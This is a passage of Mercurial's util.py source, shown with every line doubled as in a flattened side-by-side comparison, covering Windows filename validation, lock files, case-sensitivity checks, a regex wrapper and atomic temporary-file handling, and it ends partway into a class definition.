1252 >>> checkwinfilename("foo/bar/bla:.txt")
1249 >>> checkwinfilename("foo/bar/bla:.txt")
1253 "filename contains ':', which is reserved on Windows"
1250 "filename contains ':', which is reserved on Windows"
1254 >>> checkwinfilename("foo/bar/b\07la.txt")
1251 >>> checkwinfilename("foo/bar/b\07la.txt")
1255 "filename contains '\\x07', which is invalid on Windows"
1252 "filename contains '\\x07', which is invalid on Windows"
1256 >>> checkwinfilename("foo/bar/bla ")
1253 >>> checkwinfilename("foo/bar/bla ")
1257 "filename ends with ' ', which is not allowed on Windows"
1254 "filename ends with ' ', which is not allowed on Windows"
1258 >>> checkwinfilename("../bar")
1255 >>> checkwinfilename("../bar")
1259 >>> checkwinfilename("foo\\")
1256 >>> checkwinfilename("foo\\")
1260 "filename ends with '\\', which is invalid on Windows"
1257 "filename ends with '\\', which is invalid on Windows"
1261 >>> checkwinfilename("foo\\/bar")
1258 >>> checkwinfilename("foo\\/bar")
1262 "directory name ends with '\\', which is invalid on Windows"
1259 "directory name ends with '\\', which is invalid on Windows"
1263 '''
1260 '''
1264 if path.endswith('\\'):
1261 if path.endswith('\\'):
1265 return _("filename ends with '\\', which is invalid on Windows")
1262 return _("filename ends with '\\', which is invalid on Windows")
1266 if '\\/' in path:
1263 if '\\/' in path:
1267 return _("directory name ends with '\\', which is invalid on Windows")
1264 return _("directory name ends with '\\', which is invalid on Windows")
1268 for n in path.replace('\\', '/').split('/'):
1265 for n in path.replace('\\', '/').split('/'):
1269 if not n:
1266 if not n:
1270 continue
1267 continue
1271 for c in _filenamebytestr(n):
1268 for c in _filenamebytestr(n):
1272 if c in _winreservedchars:
1269 if c in _winreservedchars:
1273 return _("filename contains '%s', which is reserved "
1270 return _("filename contains '%s', which is reserved "
1274 "on Windows") % c
1271 "on Windows") % c
1275 if ord(c) <= 31:
1272 if ord(c) <= 31:
1276 return _("filename contains %r, which is invalid "
1273 return _("filename contains %r, which is invalid "
1277 "on Windows") % c
1274 "on Windows") % c
1278 base = n.split('.')[0]
1275 base = n.split('.')[0]
1279 if base and base.lower() in _winreservednames:
1276 if base and base.lower() in _winreservednames:
1280 return _("filename contains '%s', which is reserved "
1277 return _("filename contains '%s', which is reserved "
1281 "on Windows") % base
1278 "on Windows") % base
1282 t = n[-1]
1279 t = n[-1]
1283 if t in '. ' and n not in '..':
1280 if t in '. ' and n not in '..':
1284 return _("filename ends with '%s', which is not allowed "
1281 return _("filename ends with '%s', which is not allowed "
1285 "on Windows") % t
1282 "on Windows") % t
1286
1283
1287 if pycompat.osname == 'nt':
1284 if pycompat.osname == 'nt':
1288 checkosfilename = checkwinfilename
1285 checkosfilename = checkwinfilename
1289 timer = time.clock
1286 timer = time.clock
1290 else:
1287 else:
1291 checkosfilename = platform.checkosfilename
1288 checkosfilename = platform.checkosfilename
1292 timer = time.time
1289 timer = time.time
1293
1290
1294 if safehasattr(time, "perf_counter"):
1291 if safehasattr(time, "perf_counter"):
1295 timer = time.perf_counter
1292 timer = time.perf_counter
1296
1293
1297 def makelock(info, pathname):
1294 def makelock(info, pathname):
1298 try:
1295 try:
1299 return os.symlink(info, pathname)
1296 return os.symlink(info, pathname)
1300 except OSError as why:
1297 except OSError as why:
1301 if why.errno == errno.EEXIST:
1298 if why.errno == errno.EEXIST:
1302 raise
1299 raise
1303 except AttributeError: # no symlink in os
1300 except AttributeError: # no symlink in os
1304 pass
1301 pass
1305
1302
1306 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1303 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1307 os.write(ld, info)
1304 os.write(ld, info)
1308 os.close(ld)
1305 os.close(ld)
1309
1306
1310 def readlock(pathname):
1307 def readlock(pathname):
1311 try:
1308 try:
1312 return os.readlink(pathname)
1309 return os.readlink(pathname)
1313 except OSError as why:
1310 except OSError as why:
1314 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1311 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1315 raise
1312 raise
1316 except AttributeError: # no symlink in os
1313 except AttributeError: # no symlink in os
1317 pass
1314 pass
1318 fp = posixfile(pathname)
1315 fp = posixfile(pathname)
1319 r = fp.read()
1316 r = fp.read()
1320 fp.close()
1317 fp.close()
1321 return r
1318 return r
1322
1319
1323 def fstat(fp):
1320 def fstat(fp):
1324 '''stat file object that may not have fileno method.'''
1321 '''stat file object that may not have fileno method.'''
1325 try:
1322 try:
1326 return os.fstat(fp.fileno())
1323 return os.fstat(fp.fileno())
1327 except AttributeError:
1324 except AttributeError:
1328 return os.stat(fp.name)
1325 return os.stat(fp.name)
1329
1326
1330 # File system features
1327 # File system features
1331
1328
1332 def fscasesensitive(path):
1329 def fscasesensitive(path):
1333 """
1330 """
1334 Return true if the given path is on a case-sensitive filesystem
1331 Return true if the given path is on a case-sensitive filesystem
1335
1332
1336 Requires a path (like /foo/.hg) ending with a foldable final
1333 Requires a path (like /foo/.hg) ending with a foldable final
1337 directory component.
1334 directory component.
1338 """
1335 """
1339 s1 = os.lstat(path)
1336 s1 = os.lstat(path)
1340 d, b = os.path.split(path)
1337 d, b = os.path.split(path)
1341 b2 = b.upper()
1338 b2 = b.upper()
1342 if b == b2:
1339 if b == b2:
1343 b2 = b.lower()
1340 b2 = b.lower()
1344 if b == b2:
1341 if b == b2:
1345 return True # no evidence against case sensitivity
1342 return True # no evidence against case sensitivity
1346 p2 = os.path.join(d, b2)
1343 p2 = os.path.join(d, b2)
1347 try:
1344 try:
1348 s2 = os.lstat(p2)
1345 s2 = os.lstat(p2)
1349 if s2 == s1:
1346 if s2 == s1:
1350 return False
1347 return False
1351 return True
1348 return True
1352 except OSError:
1349 except OSError:
1353 return True
1350 return True
1354
1351
1355 try:
1352 try:
1356 import re2
1353 import re2
1357 _re2 = None
1354 _re2 = None
1358 except ImportError:
1355 except ImportError:
1359 _re2 = False
1356 _re2 = False
1360
1357
1361 class _re(object):
1358 class _re(object):
1362 def _checkre2(self):
1359 def _checkre2(self):
1363 global _re2
1360 global _re2
1364 try:
1361 try:
1365 # check if match works, see issue3964
1362 # check if match works, see issue3964
1366 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1363 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1367 except ImportError:
1364 except ImportError:
1368 _re2 = False
1365 _re2 = False
1369
1366
1370 def compile(self, pat, flags=0):
1367 def compile(self, pat, flags=0):
1371 '''Compile a regular expression, using re2 if possible
1368 '''Compile a regular expression, using re2 if possible
1372
1369
1373 For best performance, use only re2-compatible regexp features. The
1370 For best performance, use only re2-compatible regexp features. The
1374 only flags from the re module that are re2-compatible are
1371 only flags from the re module that are re2-compatible are
1375 IGNORECASE and MULTILINE.'''
1372 IGNORECASE and MULTILINE.'''
1376 if _re2 is None:
1373 if _re2 is None:
1377 self._checkre2()
1374 self._checkre2()
1378 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1375 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1379 if flags & remod.IGNORECASE:
1376 if flags & remod.IGNORECASE:
1380 pat = '(?i)' + pat
1377 pat = '(?i)' + pat
1381 if flags & remod.MULTILINE:
1378 if flags & remod.MULTILINE:
1382 pat = '(?m)' + pat
1379 pat = '(?m)' + pat
1383 try:
1380 try:
1384 return re2.compile(pat)
1381 return re2.compile(pat)
1385 except re2.error:
1382 except re2.error:
1386 pass
1383 pass
1387 return remod.compile(pat, flags)
1384 return remod.compile(pat, flags)
1388
1385
1389 @propertycache
1386 @propertycache
1390 def escape(self):
1387 def escape(self):
1391 '''Return the version of escape corresponding to self.compile.
1388 '''Return the version of escape corresponding to self.compile.
1392
1389
1393 This is imperfect because whether re2 or re is used for a particular
1390 This is imperfect because whether re2 or re is used for a particular
1394 function depends on the flags, etc, but it's the best we can do.
1391 function depends on the flags, etc, but it's the best we can do.
1395 '''
1392 '''
1396 global _re2
1393 global _re2
1397 if _re2 is None:
1394 if _re2 is None:
1398 self._checkre2()
1395 self._checkre2()
1399 if _re2:
1396 if _re2:
1400 return re2.escape
1397 return re2.escape
1401 else:
1398 else:
1402 return remod.escape
1399 return remod.escape
1403
1400
1404 re = _re()
1401 re = _re()
1405
1402
1406 _fspathcache = {}
1403 _fspathcache = {}
1407 def fspath(name, root):
1404 def fspath(name, root):
1408 '''Get name in the case stored in the filesystem
1405 '''Get name in the case stored in the filesystem
1409
1406
1410 The name should be relative to root, and be normcase-ed for efficiency.
1407 The name should be relative to root, and be normcase-ed for efficiency.
1411
1408
1412 Note that this function is unnecessary, and should not be
1409 Note that this function is unnecessary, and should not be
1413 called, for case-sensitive filesystems (simply because it's expensive).
1410 called, for case-sensitive filesystems (simply because it's expensive).
1414
1411
1415 The root should be normcase-ed, too.
1412 The root should be normcase-ed, too.
1416 '''
1413 '''
1417 def _makefspathcacheentry(dir):
1414 def _makefspathcacheentry(dir):
1418 return dict((normcase(n), n) for n in os.listdir(dir))
1415 return dict((normcase(n), n) for n in os.listdir(dir))
1419
1416
1420 seps = pycompat.ossep
1417 seps = pycompat.ossep
1421 if pycompat.osaltsep:
1418 if pycompat.osaltsep:
1422 seps = seps + pycompat.osaltsep
1419 seps = seps + pycompat.osaltsep
1423 # Protect backslashes. This gets silly very quickly.
1420 # Protect backslashes. This gets silly very quickly.
1424 seps.replace('\\','\\\\')
1421 seps.replace('\\','\\\\')
1425 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1422 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1426 dir = os.path.normpath(root)
1423 dir = os.path.normpath(root)
1427 result = []
1424 result = []
1428 for part, sep in pattern.findall(name):
1425 for part, sep in pattern.findall(name):
1429 if sep:
1426 if sep:
1430 result.append(sep)
1427 result.append(sep)
1431 continue
1428 continue
1432
1429
1433 if dir not in _fspathcache:
1430 if dir not in _fspathcache:
1434 _fspathcache[dir] = _makefspathcacheentry(dir)
1431 _fspathcache[dir] = _makefspathcacheentry(dir)
1435 contents = _fspathcache[dir]
1432 contents = _fspathcache[dir]
1436
1433
1437 found = contents.get(part)
1434 found = contents.get(part)
1438 if not found:
1435 if not found:
1439 # retry "once per directory" per "dirstate.walk" which
1436 # retry "once per directory" per "dirstate.walk" which
1440 # may take place for each patches of "hg qpush", for example
1437 # may take place for each patches of "hg qpush", for example
1441 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1438 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1442 found = contents.get(part)
1439 found = contents.get(part)
1443
1440
1444 result.append(found or part)
1441 result.append(found or part)
1445 dir = os.path.join(dir, part)
1442 dir = os.path.join(dir, part)
1446
1443
1447 return ''.join(result)
1444 return ''.join(result)
1448
1445
1449 def getfstype(dirpath):
1446 def getfstype(dirpath):
1450 '''Get the filesystem type name from a directory (best-effort)
1447 '''Get the filesystem type name from a directory (best-effort)
1451
1448
1452 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1449 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1453 '''
1450 '''
1454 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1451 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1455
1452
1456 def checknlink(testfile):
1453 def checknlink(testfile):
1457 '''check whether hardlink count reporting works properly'''
1454 '''check whether hardlink count reporting works properly'''
1458
1455
1459 # testfile may be open, so we need a separate file for checking to
1456 # testfile may be open, so we need a separate file for checking to
1460 # work around issue2543 (or testfile may get lost on Samba shares)
1457 # work around issue2543 (or testfile may get lost on Samba shares)
1461 f1 = testfile + ".hgtmp1"
1458 f1 = testfile + ".hgtmp1"
1462 if os.path.lexists(f1):
1459 if os.path.lexists(f1):
1463 return False
1460 return False
1464 try:
1461 try:
1465 posixfile(f1, 'w').close()
1462 posixfile(f1, 'w').close()
1466 except IOError:
1463 except IOError:
1467 try:
1464 try:
1468 os.unlink(f1)
1465 os.unlink(f1)
1469 except OSError:
1466 except OSError:
1470 pass
1467 pass
1471 return False
1468 return False
1472
1469
1473 f2 = testfile + ".hgtmp2"
1470 f2 = testfile + ".hgtmp2"
1474 fd = None
1471 fd = None
1475 try:
1472 try:
1476 oslink(f1, f2)
1473 oslink(f1, f2)
1477 # nlinks() may behave differently for files on Windows shares if
1474 # nlinks() may behave differently for files on Windows shares if
1478 # the file is open.
1475 # the file is open.
1479 fd = posixfile(f2)
1476 fd = posixfile(f2)
1480 return nlinks(f2) > 1
1477 return nlinks(f2) > 1
1481 except OSError:
1478 except OSError:
1482 return False
1479 return False
1483 finally:
1480 finally:
1484 if fd is not None:
1481 if fd is not None:
1485 fd.close()
1482 fd.close()
1486 for f in (f1, f2):
1483 for f in (f1, f2):
1487 try:
1484 try:
1488 os.unlink(f)
1485 os.unlink(f)
1489 except OSError:
1486 except OSError:
1490 pass
1487 pass
1491
1488
1492 def endswithsep(path):
1489 def endswithsep(path):
1493 '''Check path ends with os.sep or os.altsep.'''
1490 '''Check path ends with os.sep or os.altsep.'''
1494 return (path.endswith(pycompat.ossep)
1491 return (path.endswith(pycompat.ossep)
1495 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1492 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1496
1493
1497 def splitpath(path):
1494 def splitpath(path):
1498 '''Split path by os.sep.
1495 '''Split path by os.sep.
1499 Note that this function does not use os.altsep because this is
1496 Note that this function does not use os.altsep because this is
1500 an alternative of simple "xxx.split(os.sep)".
1497 an alternative of simple "xxx.split(os.sep)".
1501 It is recommended to use os.path.normpath() before using this
1498 It is recommended to use os.path.normpath() before using this
1502 function if need.'''
1499 function if need.'''
1503 return path.split(pycompat.ossep)
1500 return path.split(pycompat.ossep)
1504
1501
1505 def gui():
1502 def gui():
1506 '''Are we running in a GUI?'''
1503 '''Are we running in a GUI?'''
1507 if pycompat.sysplatform == 'darwin':
1504 if pycompat.sysplatform == 'darwin':
1508 if 'SSH_CONNECTION' in encoding.environ:
1505 if 'SSH_CONNECTION' in encoding.environ:
1509 # handle SSH access to a box where the user is logged in
1506 # handle SSH access to a box where the user is logged in
1510 return False
1507 return False
1511 elif getattr(osutil, 'isgui', None):
1508 elif getattr(osutil, 'isgui', None):
1512 # check if a CoreGraphics session is available
1509 # check if a CoreGraphics session is available
1513 return osutil.isgui()
1510 return osutil.isgui()
1514 else:
1511 else:
1515 # pure build; use a safe default
1512 # pure build; use a safe default
1516 return True
1513 return True
1517 else:
1514 else:
1518 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1515 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1519
1516
1520 def mktempcopy(name, emptyok=False, createmode=None):
1517 def mktempcopy(name, emptyok=False, createmode=None):
1521 """Create a temporary file with the same contents from name
1518 """Create a temporary file with the same contents from name
1522
1519
1523 The permission bits are copied from the original file.
1520 The permission bits are copied from the original file.
1524
1521
1525 If the temporary file is going to be truncated immediately, you
1522 If the temporary file is going to be truncated immediately, you
1526 can use emptyok=True as an optimization.
1523 can use emptyok=True as an optimization.
1527
1524
1528 Returns the name of the temporary file.
1525 Returns the name of the temporary file.
1529 """
1526 """
1530 d, fn = os.path.split(name)
1527 d, fn = os.path.split(name)
1531 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1528 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1532 os.close(fd)
1529 os.close(fd)
1533 # Temporary files are created with mode 0600, which is usually not
1530 # Temporary files are created with mode 0600, which is usually not
1534 # what we want. If the original file already exists, just copy
1531 # what we want. If the original file already exists, just copy
1535 # its mode. Otherwise, manually obey umask.
1532 # its mode. Otherwise, manually obey umask.
1536 copymode(name, temp, createmode)
1533 copymode(name, temp, createmode)
1537 if emptyok:
1534 if emptyok:
1538 return temp
1535 return temp
1539 try:
1536 try:
1540 try:
1537 try:
1541 ifp = posixfile(name, "rb")
1538 ifp = posixfile(name, "rb")
1542 except IOError as inst:
1539 except IOError as inst:
1543 if inst.errno == errno.ENOENT:
1540 if inst.errno == errno.ENOENT:
1544 return temp
1541 return temp
1545 if not getattr(inst, 'filename', None):
1542 if not getattr(inst, 'filename', None):
1546 inst.filename = name
1543 inst.filename = name
1547 raise
1544 raise
1548 ofp = posixfile(temp, "wb")
1545 ofp = posixfile(temp, "wb")
1549 for chunk in filechunkiter(ifp):
1546 for chunk in filechunkiter(ifp):
1550 ofp.write(chunk)
1547 ofp.write(chunk)
1551 ifp.close()
1548 ifp.close()
1552 ofp.close()
1549 ofp.close()
1553 except: # re-raises
1550 except: # re-raises
1554 try: os.unlink(temp)
1551 try: os.unlink(temp)
1555 except OSError: pass
1552 except OSError: pass
1556 raise
1553 raise
1557 return temp
1554 return temp
1558
1555
1559 class filestat(object):
1556 class filestat(object):
1560 """help to exactly detect change of a file
1557 """help to exactly detect change of a file
1561
1558
1562 'stat' attribute is result of 'os.stat()' if specified 'path'
1559 'stat' attribute is result of 'os.stat()' if specified 'path'
1563 exists. Otherwise, it is None. This can avoid preparative
1560 exists. Otherwise, it is None. This can avoid preparative
1564 'exists()' examination on client side of this class.
1561 'exists()' examination on client side of this class.
1565 """
1562 """
1566 def __init__(self, stat):
1563 def __init__(self, stat):
1567 self.stat = stat
1564 self.stat = stat
1568
1565
1569 @classmethod
1566 @classmethod
1570 def frompath(cls, path):
1567 def frompath(cls, path):
1571 try:
1568 try:
1572 stat = os.stat(path)
1569 stat = os.stat(path)
1573 except OSError as err:
1570 except OSError as err:
1574 if err.errno != errno.ENOENT:
1571 if err.errno != errno.ENOENT:
1575 raise
1572 raise
1576 stat = None
1573 stat = None
1577 return cls(stat)
1574 return cls(stat)
1578
1575
1579 @classmethod
1576 @classmethod
1580 def fromfp(cls, fp):
1577 def fromfp(cls, fp):
1581 stat = os.fstat(fp.fileno())
1578 stat = os.fstat(fp.fileno())
1582 return cls(stat)
1579 return cls(stat)
1583
1580
1584 __hash__ = object.__hash__
1581 __hash__ = object.__hash__
1585
1582
1586 def __eq__(self, old):
1583 def __eq__(self, old):
1587 try:
1584 try:
1588 # if ambiguity between stat of new and old file is
1585 # if ambiguity between stat of new and old file is
1589 # avoided, comparison of size, ctime and mtime is enough
1586 # avoided, comparison of size, ctime and mtime is enough
1590 # to exactly detect change of a file regardless of platform
1587 # to exactly detect change of a file regardless of platform
1591 return (self.stat.st_size == old.stat.st_size and
1588 return (self.stat.st_size == old.stat.st_size and
1592 self.stat.st_ctime == old.stat.st_ctime and
1589 self.stat.st_ctime == old.stat.st_ctime and
1593 self.stat.st_mtime == old.stat.st_mtime)
1590 self.stat.st_mtime == old.stat.st_mtime)
1594 except AttributeError:
1591 except AttributeError:
1595 pass
1592 pass
1596 try:
1593 try:
1597 return self.stat is None and old.stat is None
1594 return self.stat is None and old.stat is None
1598 except AttributeError:
1595 except AttributeError:
1599 return False
1596 return False
1600
1597
1601 def isambig(self, old):
1598 def isambig(self, old):
1602 """Examine whether new (= self) stat is ambiguous against old one
1599 """Examine whether new (= self) stat is ambiguous against old one
1603
1600
1604 "S[N]" below means stat of a file at N-th change:
1601 "S[N]" below means stat of a file at N-th change:
1605
1602
1606 - S[n-1].ctime < S[n].ctime: can detect change of a file
1603 - S[n-1].ctime < S[n].ctime: can detect change of a file
1607 - S[n-1].ctime == S[n].ctime
1604 - S[n-1].ctime == S[n].ctime
1608 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1605 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1609 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1606 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1610 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1607 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1611 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1608 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1612
1609
1613 Case (*2) above means that a file was changed twice or more at
1610 Case (*2) above means that a file was changed twice or more at
1614 same time in sec (= S[n-1].ctime), and comparison of timestamp
1611 same time in sec (= S[n-1].ctime), and comparison of timestamp
1615 is ambiguous.
1612 is ambiguous.
1616
1613
1617 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1614 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1618 timestamp is ambiguous".
1615 timestamp is ambiguous".
1619
1616
1620 But advancing mtime only in case (*2) doesn't work as
1617 But advancing mtime only in case (*2) doesn't work as
1621 expected, because naturally advanced S[n].mtime in case (*1)
1618 expected, because naturally advanced S[n].mtime in case (*1)
1622 might be equal to manually advanced S[n-1 or earlier].mtime.
1619 might be equal to manually advanced S[n-1 or earlier].mtime.
1623
1620
1624 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1621 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1625 treated as ambiguous regardless of mtime, to avoid overlooking
1622 treated as ambiguous regardless of mtime, to avoid overlooking
1626 by confliction between such mtime.
1623 by confliction between such mtime.
1627
1624
1628 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1625 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1629 S[n].mtime", even if size of a file isn't changed.
1626 S[n].mtime", even if size of a file isn't changed.
1630 """
1627 """
1631 try:
1628 try:
1632 return (self.stat.st_ctime == old.stat.st_ctime)
1629 return (self.stat.st_ctime == old.stat.st_ctime)
1633 except AttributeError:
1630 except AttributeError:
1634 return False
1631 return False
1635
1632
1636 def avoidambig(self, path, old):
1633 def avoidambig(self, path, old):
1637 """Change file stat of specified path to avoid ambiguity
1634 """Change file stat of specified path to avoid ambiguity
1638
1635
1639 'old' should be previous filestat of 'path'.
1636 'old' should be previous filestat of 'path'.
1640
1637
1641 This skips avoiding ambiguity, if a process doesn't have
1638 This skips avoiding ambiguity, if a process doesn't have
1642 appropriate privileges for 'path'. This returns False in this
1639 appropriate privileges for 'path'. This returns False in this
1643 case.
1640 case.
1644
1641
1645 Otherwise, this returns True, as "ambiguity is avoided".
1642 Otherwise, this returns True, as "ambiguity is avoided".
1646 """
1643 """
1647 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1644 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1648 try:
1645 try:
1649 os.utime(path, (advanced, advanced))
1646 os.utime(path, (advanced, advanced))
1650 except OSError as inst:
1647 except OSError as inst:
1651 if inst.errno == errno.EPERM:
1648 if inst.errno == errno.EPERM:
1652 # utime() on the file created by another user causes EPERM,
1649 # utime() on the file created by another user causes EPERM,
1653 # if a process doesn't have appropriate privileges
1650 # if a process doesn't have appropriate privileges
1654 return False
1651 return False
1655 raise
1652 raise
1656 return True
1653 return True
1657
1654
1658 def __ne__(self, other):
1655 def __ne__(self, other):
1659 return not self == other
1656 return not self == other
1660
1657
1661 class atomictempfile(object):
1658 class atomictempfile(object):
1662 '''writable file object that atomically updates a file
1659 '''writable file object that atomically updates a file
1663
1660
1664 All writes will go to a temporary copy of the original file. Call
1661 All writes will go to a temporary copy of the original file. Call
1665 close() when you are done writing, and atomictempfile will rename
1662 close() when you are done writing, and atomictempfile will rename
1666 the temporary copy to the original name, making the changes
1663 the temporary copy to the original name, making the changes
1667 visible. If the object is destroyed without being closed, all your
1664 visible. If the object is destroyed without being closed, all your
1668 writes are discarded.
1665 writes are discarded.
1669
1666
1670 checkambig argument of constructor is used with filestat, and is
1667 checkambig argument of constructor is used with filestat, and is
1671 useful only if target file is guarded by any lock (e.g. repo.lock
1668 useful only if target file is guarded by any lock (e.g. repo.lock
1672 or repo.wlock).
1669 or repo.wlock).
1673 '''
1670 '''
1674 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1671 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1675 self.__name = name # permanent name
1672 self.__name = name # permanent name
1676 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1673 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1677 createmode=createmode)
1674 createmode=createmode)
1678 self._fp = posixfile(self._tempname, mode)
1675 self._fp = posixfile(self._tempname, mode)
1679 self._checkambig = checkambig
1676 self._checkambig = checkambig
1680
1677
1681 # delegated methods
1678 # delegated methods
1682 self.read = self._fp.read
1679 self.read = self._fp.read
1683 self.write = self._fp.write
1680 self.write = self._fp.write
1684 self.seek = self._fp.seek
1681 self.seek = self._fp.seek
1685 self.tell = self._fp.tell
1682 self.tell = self._fp.tell
1686 self.fileno = self._fp.fileno
1683 self.fileno = self._fp.fileno
1687
1684
1688 def close(self):
1685 def close(self):
1689 if not self._fp.closed:
1686 if not self._fp.closed:
1690 self._fp.close()
1687 self._fp.close()
1691 filename = localpath(self.__name)
1688 filename = localpath(self.__name)
1692 oldstat = self._checkambig and filestat.frompath(filename)
1689 oldstat = self._checkambig and filestat.frompath(filename)
1693 if oldstat and oldstat.stat:
1690 if oldstat and oldstat.stat:
1694 rename(self._tempname, filename)
1691 rename(self._tempname, filename)
1695 newstat = filestat.frompath(filename)
1692 newstat = filestat.frompath(filename)
1696 if newstat.isambig(oldstat):
1693 if newstat.isambig(oldstat):
1697 # stat of changed file is ambiguous to original one
1694 # stat of changed file is ambiguous to original one
1698 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1695 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1699 os.utime(filename, (advanced, advanced))
1696 os.utime(filename, (advanced, advanced))
1700 else:
1697 else:
1701 rename(self._tempname, filename)
1698 rename(self._tempname, filename)
1702
1699
1703 def discard(self):
1700 def discard(self):
1704 if not self._fp.closed:
1701 if not self._fp.closed:
1705 try:
1702 try:
1706 os.unlink(self._tempname)
1703 os.unlink(self._tempname)
1707 except OSError:
1704 except OSError:
1708 pass
1705 pass
1709 self._fp.close()
1706 self._fp.close()
1710
1707
1711 def __del__(self):
1708 def __del__(self):
1712 if safehasattr(self, '_fp'): # constructor actually did something
1709 if safehasattr(self, '_fp'): # constructor actually did something
1713 self.discard()
1710 self.discard()
1714
1711
1715 def __enter__(self):
1712 def __enter__(self):
1716 return self
1713 return self
1717
1714
1718 def __exit__(self, exctype, excvalue, traceback):
1715 def __exit__(self, exctype, excvalue, traceback):
1719 if exctype is not None:
1716 if exctype is not None:
1720 self.discard()
1717 self.discard()
1721 else:
1718 else:
1722 self.close()
1719 self.close()
1723
1720
1724 def unlinkpath(f, ignoremissing=False):
1721 def unlinkpath(f, ignoremissing=False):
1725 """unlink and remove the directory if it is empty"""
1722 """unlink and remove the directory if it is empty"""
1726 if ignoremissing:
1723 if ignoremissing:
1727 tryunlink(f)
1724 tryunlink(f)
1728 else:
1725 else:
1729 unlink(f)
1726 unlink(f)
1730 # try removing directories that might now be empty
1727 # try removing directories that might now be empty
1731 try:
1728 try:
1732 removedirs(os.path.dirname(f))
1729 removedirs(os.path.dirname(f))
1733 except OSError:
1730 except OSError:
1734 pass
1731 pass
1735
1732
1736 def tryunlink(f):
1733 def tryunlink(f):
1737 """Attempt to remove a file, ignoring ENOENT errors."""
1734 """Attempt to remove a file, ignoring ENOENT errors."""
1738 try:
1735 try:
1739 unlink(f)
1736 unlink(f)
1740 except OSError as e:
1737 except OSError as e:
1741 if e.errno != errno.ENOENT:
1738 if e.errno != errno.ENOENT:
1742 raise
1739 raise
1743
1740
1744 def makedirs(name, mode=None, notindexed=False):
1741 def makedirs(name, mode=None, notindexed=False):
1745 """recursive directory creation with parent mode inheritance
1742 """recursive directory creation with parent mode inheritance
1746
1743
1747 Newly created directories are marked as "not to be indexed by
1744 Newly created directories are marked as "not to be indexed by
1748 the content indexing service", if ``notindexed`` is specified
1745 the content indexing service", if ``notindexed`` is specified
1749 for "write" mode access.
1746 for "write" mode access.
1750 """
1747 """
1751 try:
1748 try:
1752 makedir(name, notindexed)
1749 makedir(name, notindexed)
1753 except OSError as err:
1750 except OSError as err:
1754 if err.errno == errno.EEXIST:
1751 if err.errno == errno.EEXIST:
1755 return
1752 return
1756 if err.errno != errno.ENOENT or not name:
1753 if err.errno != errno.ENOENT or not name:
1757 raise
1754 raise
1758 parent = os.path.dirname(os.path.abspath(name))
1755 parent = os.path.dirname(os.path.abspath(name))
1759 if parent == name:
1756 if parent == name:
1760 raise
1757 raise
1761 makedirs(parent, mode, notindexed)
1758 makedirs(parent, mode, notindexed)
1762 try:
1759 try:
1763 makedir(name, notindexed)
1760 makedir(name, notindexed)
1764 except OSError as err:
1761 except OSError as err:
1765 # Catch EEXIST to handle races
1762 # Catch EEXIST to handle races
1766 if err.errno == errno.EEXIST:
1763 if err.errno == errno.EEXIST:
1767 return
1764 return
1768 raise
1765 raise
1769 if mode is not None:
1766 if mode is not None:
1770 os.chmod(name, mode)
1767 os.chmod(name, mode)
1771
1768
1772 def readfile(path):
1769 def readfile(path):
1773 with open(path, 'rb') as fp:
1770 with open(path, 'rb') as fp:
1774 return fp.read()
1771 return fp.read()
1775
1772
1776 def writefile(path, text):
1773 def writefile(path, text):
1777 with open(path, 'wb') as fp:
1774 with open(path, 'wb') as fp:
1778 fp.write(text)
1775 fp.write(text)
1779
1776
1780 def appendfile(path, text):
1777 def appendfile(path, text):
1781 with open(path, 'ab') as fp:
1778 with open(path, 'ab') as fp:
1782 fp.write(text)
1779 fp.write(text)
1783
1780
1784 class chunkbuffer(object):
1781 class chunkbuffer(object):
1785 """Allow arbitrary sized chunks of data to be efficiently read from an
1782 """Allow arbitrary sized chunks of data to be efficiently read from an
1786 iterator over chunks of arbitrary size."""
1783 iterator over chunks of arbitrary size."""
1787
1784
1788 def __init__(self, in_iter):
1785 def __init__(self, in_iter):
1789 """in_iter is the iterator that's iterating over the input chunks."""
1786 """in_iter is the iterator that's iterating over the input chunks."""
1790 def splitbig(chunks):
